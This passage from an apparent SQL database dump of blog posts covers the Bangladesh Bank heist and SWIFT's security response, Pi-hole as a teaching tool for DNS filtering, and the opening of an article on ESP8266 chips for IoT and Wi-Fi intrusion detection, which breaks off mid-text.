heroes of this heist. A simple printer error prevented transaction records from being printed automatically. When employees returned to work on Monday and noticed this irregularity, suspicions were raised.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The bank swiftly investigated the matter and discovered the fraudulent transactions, enabling them to halt additional transfers. 
Although $81 million still made its way into the hands of the attackers, the prompt response helped reduce the scale of the damages.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Happened After the Heist?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Bangladesh Bank heist was nothing short of a wake-up call for the global financial industry. It exposed glaring vulnerabilities in systems designed to secure the movement of trillions of dollars every day. Here’s how SWIFT responded:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Security Enhancements Implemented by SWIFT</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Customer Security Controls Framework (CSCF):</strong></b> SWIFT introduced a comprehensive framework of mandatory and advisory security controls to be adopted by all users.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Enhanced Authentication:</strong></b> Stricter measures were implemented to verify the legitimacy of financial transactions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Improved Monitoring Systems:</strong></b> Systems were upgraded to better detect and flag suspicious activities in real time.</li>\r\n 	<li class=\"text-body font-regular 
leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Threat Intelligence Sharing:</strong></b> A framework for sharing threat intelligence among SWIFT users was established, fostering a collective defense against cyber threats.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These efforts have significantly improved the security of the SWIFT network, but they also serve as a reminder that cybersecurity is an ongoing battle.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Lessons Learned from the Bangladesh Bank Heist</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The heist offered valuable lessons for banks and financial institutions around the globe. It underscored the critical importance of adopting robust, proactive cybersecurity measures. Here are some key takeaways:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Continuous Monitoring</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Financial institutions should adopt 24/7 surveillance of their network activities. 
Real-time monitoring helps detect and mitigate threats before they cause significant damage.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Regular Security Audits</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Frequent assessments help identify potential vulnerabilities in a system. Fixing these weaknesses before they are exploited is essential for staying ahead of cybercriminals.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Employee Training</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social engineering is a favorite tactic for hackers. Regular training sessions for staff can significantly reduce the chances of falling victim to phishing or other manipulative techniques.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Incident Response Planning</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A robust incident response plan is critical. 
When a breach occurs, having a clear action plan ensures swift containment of the damage and minimizes financial loss.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts on the Global Impact of the Bangladesh Bank Heist</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Bangladesh Bank heist wasn’t just a financial crime—it became a pivotal moment in the history of cybersecurity. While the attackers managed to steal $81 million, the incident was a catalyst for change, prompting financial institutions worldwide to reevaluate and strengthen their cybersecurity measures.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With cyber threats continuing to evolve, the financial sector must remain vigilant. By adopting layered security systems, leveraging advanced monitoring tools, and fostering industry-wide collaboration, institutions can stay ahead of the curve and protect their assets.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If the Bangladesh Bank heist reminds us of one thing, it’s this: cybersecurity isn’t just a best practice—it’s a critical necessity in today’s interconnected financial landscape.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By learning from the events of February 2016, banks and financial institutions can fortify their defenses and ensure that such large-scale breaches remain a thing of the past</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:44:33', '2026-01-12 21:41:44', 'History', 'The Bangladesh Bank Heist: How Cybercriminals Exposed Vulnerabilities in Global Banking', '', NULL),
(128, 'Unlocking the Power of Pi-hole in Cybersecurity Education', 'unlocking-the-power-of-pi-hole-in-cybersecurity-education', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">As the landscape of cybersecurity continues to evolve at a rapid pace, the need for practical, hands-on tools becomes increasingly crucial. One such tool that\'s gaining traction in both home networks and educational settings is <b><strong class=\"font-bold\">Pi-hole</strong></b>, a network-wide ad blocker and a powerful resource for enhancing cybersecurity skills.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But Pi-hole is much more than an ad blocker—it’s an invaluable educational tool for cybersecurity enthusiasts and professionals alike. This article will explore the capabilities, benefits, and tremendous potential of Pi-hole in cybersecurity education, highlighting how it serves as a bridge between theoretical concepts and real-world applications.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What is Pi-hole?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Pi-hole is an open-source software that acts as a DNS sinkhole, effectively blocking unwanted content at the network level. Unlike browser-based ad blockers, Pi-hole operates across your entire network. 
By routing DNS requests through Pi-hole, you can block ads, malware, and tracking domains before they even reach your devices.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Features of Pi-hole</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Network-wide Protection</strong></b>: Once configured, all devices on your network are automatically covered. No need to install software on each device.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Customizable Block Lists</strong></b>: Users can choose pre-configured block lists or add their own, making Pi-hole incredibly adaptable to individual needs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Performance Boost</strong></b>: By blocking unwanted content at the DNS level, network performance is improved, reducing load times and conserving bandwidth.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">User-Friendly Interface</strong></b>: Pi-hole includes an intuitive web dashboard, offering an easy way to monitor and control network activity in real time.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of Pi-hole in 
Cybersecurity Education</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Pi-hole isn’t just a utility for blocking ads—it’s a versatile platform for learning cybersecurity fundamentals. Here’s how Pi-hole can play a significant role in developing hands-on skills in network security.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Understanding DNS and Network Traffic</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">DNS (Domain Name System) is a crucial backbone of the internet. Using Pi-hole, students gain hands-on experience with DNS requests and filtering.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Explore the Flow of DNS Queries</strong></b>: Learn how DNS requests are processed, and practice identifying and blocking malicious domains.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Visualize Traffic</strong></b>: The Pi-hole dashboard provides real-time data on DNS activity, offering a practical understanding of the data flow in a network.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
<b><strong class=\"font-bold\">Applying Security Concepts in Practice</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike purely theoretical lessons, Pi-hole allows students to actually implement cybersecurity measures.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Network Configuration</strong></b>: Setting up Pi-hole involves configuring network settings, managing DNS servers, and using the Linux command line, all vital skills in cybersecurity.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Blocking Malicious Domains</strong></b>: Understand and apply key security concepts like preventing access to known phishing or malicious websites through DNS filtering.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Monitoring and Analyzing Network Activity</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Network monitoring is a critical skill for cybersecurity professionals. 
Pi-hole allows students to develop this skill in a controlled and practical environment.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Threat Detection</strong></b>: Identify potentially harmful domains by monitoring DNS query logs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Traffic Trends</strong></b>: Analyze data patterns to understand network activity and detect anomalies.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Enhancing Online Privacy</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Privacy is an essential pillar of cybersecurity. 
By blocking tracking domains, Pi-hole protects user data and reduces exposure to online threats.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Real-World Applications</strong></b>: Hands-on experience with privacy-enhancing tools gives learners a competitive edge when applying for cybersecurity roles.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Ethical Decision-Making</strong></b>: Explore the role of privacy in cybersecurity and how tools like Pi-hole strengthen user trust.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Getting Started with Pi-hole</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Setting up Pi-hole is straightforward, and it’s accessible for learners of all experience levels.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Installation</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Pi-hole can be installed on several platforms, including Raspberry Pi, Docker, virtual machines, or even cloud environments. 
Follow the step-by-step guide linked here to get started:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://pi-hole.net/\">Official Installation Guide</a></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://github.com/pi-hole/pi-hole#one-step-automated-install\">GitHub Installation Documentation</a></li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Configuration</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once installed, you can customize Pi-hole to suit specific needs.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Add Custom Block Lists</strong></b>: Choose from a variety of pre-configured lists or curate your own for enhanced filtering.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Integrate with Other Tools</strong></b>: Connect Pi-hole to additional security tools or a VPN for even greater protection.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" 
dir=\"ltr\">Maintenance and Updates</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To ensure Pi-hole operates optimally, regular updates are essential.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Update Block Lists</strong></b>: Keep your block lists current to protect against new threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Monitor Performance</strong></b>: Use the web dashboard to monitor usage statistics and make necessary adjustments.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of Incorporating Pi-hole into Cybersecurity Education</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Hands-On Experience</strong></b>: Pi-hole bridges the gap between theoretical learning and real-world applications, making abstract concepts tangible.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Adaptable for All Skill Levels</strong></b>: From beginners learning about DNS to advanced users exploring network traffic analysis, Pi-hole caters to a wide range of learners.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] 
[&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Critical Thinking Development</strong></b>: Encourages students to think critically about network security, privacy, and ethical considerations.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Choose Pi-hole for Your Educational Needs?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Pi-hole stands out as a multi-functional tool that is not only cost-effective but also open-source, making it accessible for educational institutions and individuals alike.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Community Support</strong></b>: With an active user base and extensive online documentation, help is always at hand.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Scalable</strong></b>: From small practices on Raspberry Pi to enterprise-level configurations, Pi-hole can scale to meet the needs of any user.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you’re looking to develop hands-on skills in cybersecurity, Pi-hole is the perfect tool to begin your journey. 
By bridging the gap between theory and practice, it provides invaluable insights into DNS management, network security, and online privacy. Whether you’re a student learning the basics or a professional seeking to enhance your skills, Pi-hole offers an engaging and practical learning experience.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Are you ready to unlock the potential of Pi-hole? Start your cybersecurity education today by setting up Pi-hole on your network. Remember—the best way to learn is through DOING</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:42:37', '2026-01-12 21:41:44', 'Network Security', 'Unlocking the Power of Pi-hole in Cybersecurity Education', '', NULL),
(129, 'ESP8266: A Tiny WiFi Chip Powering Big IoT and Cybersecurity Innovations', 'esp8266-a-tiny-wifi-chip-powering-big-iot-and-cybersecurity-innovations', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266, a small yet powerful low-cost chip, has revolutionized IoT (Internet of Things) projects by bringing Wi-Fi capabilities to a wide range of applications. With its ability to connect devices to the internet, process data, and easy programmability, the ESP8266 has become a favorite among developers, tech hobbyists, and cybersecurity enthusiasts. But its potential doesn’t end with IoT; this tiny chip also has exciting applications in the cybersecurity domain.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This article explores the ESP8266’s features, how it’s used in cybersecurity, and a notable project that demonstrates its potential. Whether you’re an IoT hobbyist or curious about ethical hacking tools, this guide will provide the essential details you need.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Makes the ESP8266 a Game-Changer?</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 stands out due to its simplicity, affordability, and versatility. 
Here\'s a breakdown of its core features:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Wi-Fi Connectivity</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It allows seamless wireless communication, enabling devices to connect to the internet for remote control, monitoring, and data sharing.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Built-in Processing Power</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With its onboard processing capabilities, the ESP8266 can handle sensor data and perform actions without relying on an external computer.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Beginner-Friendly Programming</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The chip is compatible with popular platforms like the Arduino IDE, making it accessible to newcomers and experienced developers alike.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Its low cost, combined with these features, has made it a staple in IoT projects. 
But the ESP8266 is not just for IoT—it can also play a role in cybersecurity innovation.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Unlocking Cybersecurity Potential with ESP8266</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 wasn’t originally designed for cybersecurity, but its features can creatively address various security challenges. Here are some compelling examples:</p>\r\n\r\n<h4 class=\"font-bold text-body leading-[24px] pt-[12px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Intrusion Detection System (IDS)</strong></b></h4>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The ESP8266 can be programmed to monitor a Wi-Fi network for suspicious activity. Using its capabilities, you can:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Scan for unknown or unauthorized devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Identify potential jamming attempts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Detect deauthentication attacks—when a hacker forces devices to disconnect from the network.</li>\r\n</ul>\r\n<p 